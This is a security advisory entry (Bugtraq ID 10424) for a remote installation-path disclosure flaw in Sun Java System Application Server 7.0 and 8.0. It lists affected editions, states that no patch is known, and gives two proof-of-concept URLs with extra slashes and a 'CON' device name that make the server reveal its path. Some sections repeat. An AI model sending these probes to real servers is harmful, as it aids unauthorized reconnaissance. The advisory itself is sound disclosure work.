Sun Java System Application Server Remote Installation Path Disclosure Vulnerability
BID:10424
Info
Sun Java System Application Server Remote Installation Path Disclosure Vulnerability
| Bugtraq ID: | 10424 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 27 2004 12:00AM |
| Updated: | May 27 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Marc Schoenefeld <[email protected]>. |
| Vulnerable: |
Sun Java System Application Server 8.0 Platform Edition Sun Java System Application Server 7.0 Standard Edition Sun Java System Application Server 7.0 Platform Edition Sun Java System Application Server 7.0 Enterprise Edition |
| Not Vulnerable: | |
Discussion
Exploit / POC
Sun Java System Application Server Remote Installation Path Disclosure Vulnerability
There is no exploit required, the following example is available.
http://www.example.com:8080////
http://www.example.com:8080////CON
There is no exploit required, the following example is available.
http://www.example.com:8080////
http://www.example.com:8080////CON
Solution / Fix
Sun Java System Application Server Remote Installation Path Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Sun Java System Application Server Remote Installation Path Disclosure Vulnerability
References:
References:
- Sun Java System Application Server Homepage (Sun)
- Sun-Java-App-Server PE 8.0 path disclosure (Marc Schoenefeld
)